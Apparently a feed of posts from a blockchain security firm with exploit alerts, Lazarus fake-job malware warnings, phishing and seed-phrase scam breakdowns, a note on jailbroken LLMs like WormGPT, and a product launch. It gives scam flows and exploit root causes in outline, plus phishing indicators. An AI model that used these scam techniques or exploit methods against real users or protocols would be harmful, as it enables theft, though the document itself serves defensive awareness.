Our monitoring system MistEye has detected suspicious transactions involving @ResupplyFi, with losses of approximately $5.59M.
The attacker manipulated the cvcrvUSD exchange rate by making donations to the cvcrvUSD Controller contract, ultimately stealing a large amount of reUSD tokens.
Our monitoring system MistEye has detected suspicious transactions involving @ResupplyFi, with losses of approximately $5.59M.
The attacker manipulated the cvcrvUSD exchange rate by making donations to the crvUSD Controller contract, ultimately stealing a large amount of reUSD tokens.
💰Over $50B USDT in deposits and $50B in withdrawals flowed through HuionePay in the past 18 months — now under global regulatory scrutiny for allegedly receiving, moving, and cashing out scam funds (mostly via USDT on TRON).
We dug into the data with @MistTrack_io and built a Dune dashboard to map its on-chain footprint.
According to community partner @1nf0s3cpt, an active phishing campaign is targeting Web3 users with fake job offers (e.g. $120/hour) to trick them into executing a malicious script that steals wallet files.
🧪 The attack method is very similar to the previous Lazarus use of NPM packages to spread malicious code: https://t.co/bBC4i2vYpA
🚨 We found that a new malicious NPM package was just published: https://t.co/SjgmO1FOIL
🔸Likely linked GitHub: apollo-hero
🔸Uploader email: skelstar125@gmail.com
⚠️ Do NOT install or run unknown packages or scripts. Always verify sources.
We have detected potential suspicious activities related to @meta_pool. The root cause is that the _deposit function has been rewritten, enabling arbitrary minting through the mint function without the need to transfer tokens.
‼️Beware of a new threat from the LAZARUS APT group — #OtterCookie info-stealer malware is targeting professionals in the finance and crypto industries.
🎯 Attack tactics:
🔹Posing as reputable companies with fake interviews or investment pitches
🔹Using deepfakes to impersonate interviewers/investors in video calls
🔹Tricking victims into running malware disguised as coding challenges or video app updates
🔹Once executed, OtterCookie steals sensitive data silently
🛡️ Stay safe:
🔹Verify all unsolicited job/investment offers
🔹Never run unknown binaries, especially “challenges” or “updates”
🔹Use anti-virus software and monitor for abnormal behaviors
SlowMist recently received intelligence indicating that the Lazarus APT group is using a new stealer called OtterCookie in targeted attacks on crypto & finance pros.
🎭Tactics:
- Fake job interviews/investor calls
- Deepfake videos to impersonate recruiters
- Malware disguised as “coding challenges” or “updates”
😈Steals:
- Browser-stored login credentials
- Passwords & certificates from macOS Keychain
- Wallet info & private keys
🛡️Security Recommendations:
🔹Treat unsolicited job/investment offers and remote interviews with caution.
🔹Never run unknown binaries, especially if presented as “technical challenges” or “update packages.”
🔹Enhance EDR capabilities and monitor for abnormal activity. Use antivirus tools and regularly audit your endpoints.
⚠️As AI races forward, a darker side emerges: Unrestricted Large Language Models.
Unlike mainstream LLMs with built-in safety guards, these "jailbroken" or deliberately modified models are designed to bypass ethical restrictions—enabling phishing, malware generation, and fraud.
In this article, we explore the rise of tools like WormGPT, FraudGPT, and GhostGPT, their abuse in the crypto space, and the growing security challenges they pose.
📊According to SlowMist's Hacked (https://t.co/e90CSvTm6B):
⚠️15 hacking incidents ➡️ about $257 million lost
❄️ About $162 million recovered/frozen
🎣Phishing losses via @realScamSniffer: 7,164 victims ➡️ about $9.6 million stolen
Key incidents:
• Cetus protocol lost $230 million in a math overflow attack
• Cork protocol was exploited for more than $12 million due to insufficient validation of user-supplied data
• BitoPro lost $11.5 million; the funds were laundered via Tornado Cash, THORChain, and Wasabi
• Demex lost $950 thousand to an oracle manipulation that targeted an old vault
• Zunami lost $500 thousand; the root cause is under investigation
Security highlights:
⚠️ Contract vulnerabilities caused 95% of total hack losses.
🎭 Account takeovers are on the rise again.
😈 The Lazarus Group is now targeting individuals - one victim lost $5.2 million to malware.
We recently assisted a user who encountered a suspicious tool claiming his wallet had a “risky authorization.” The tool prompted him to paste his private key to resolve the issue.
After investigation, we identified the site—signature[.]land—as a phishing platform. The site has also been flagged as malicious by Web3 anti-scam platform @realScamSniffer.
Key findings:
♦️UI mimics the legitimate Revoke tool
♦️Risk results are fabricated for any input
♦️All user input is sent directly to: abpulimali@gmail[.]com
The operator behind this site, @Titanspace3, employs multiple deceptive tactics:
🎭Uses @zachxbt’s avatar on Telegram
🎭Poses as a SlowMist employee
🎭Runs a 74K-follower X account, frequently commenting under crypto users’ posts, falsely claiming their wallets are at risk and directing them to a phishing link disguised as a “security tool.”
Scam flow:
1⃣Fabricate panic around “risky approvals”
2⃣Lure victims into using a phishing site
3⃣Instruct them to input private keys for “revocation”
🛡️Recommendations
– Never paste your private key into any website
– Only use security tools from verified, official sources
– Stay vigilant and follow a zero-trust mindset
For a full breakdown of this case, see our latest article: https://t.co/IvrVPrT6Su
☠️Many users have recently reported receiving SMS messages from "well-known trading platforms", saying:
🎭 "Your withdrawal verification code is xxx. If you did not request this transaction, call xxx immediately for assistance."
📱Once you call back, you are told it is a "security breach" and are connected to someone claiming to be from "hardware wallet support".
🎣They direct you to a phishing site and trick you into entering your seed phrase - leading to cold wallet thefts of more than $1 million.
⚠️Scammers know you trust trading platforms - and they exploit that trust to deceive you step by step.
We recently uncovered a similar case - see our detailed report to strengthen your awareness and defenses:
https://t.co/OLGtlY1HBV
Remember:
🔒 Never share your seed phrase.
🚫 Do not trust unexpected calls, text messages, or links. Always verify through official sources.
#Web3Security #PhishingAlert #ColdWallet #CryptoScam #SocialEngineering
We’ve received reports of fake Telegram groups impersonating #SlowMist and scamming users via phishing investment links. One example: ❌t[.]me/slowmist1 — this is NOT us.‼️
✅ Please report such groups to Telegram immediately.
For your safety, always refer to our official channels:
1⃣Website: https://t.co/IO2VWk2pae
2⃣X: @SlowMist_Team & @MistTrack_io
3⃣Email: team@slowmist.com
🚀Big news! @MistTrack_io MCP is now live for testing!
You can now use natural language in #Claude, #Cursor, and other MCP-supported clients to call #MistTrack’s on-chain analysis APIs — from address profiling & risk scoring to fund flow graphs.
🧐Smarter, faster, and easier blockchain investigations — powered by AI.
✍️In our latest post:
🔹What is MistTrack MCP
🔹How to use it
🔹Core features
🔹Real use case examples
https://t.co/Fvn2YZIuoI
👋Ready to explore the new AI paradigm for on-chain tracing? Start here: https://t.co/UCDcC9Dt51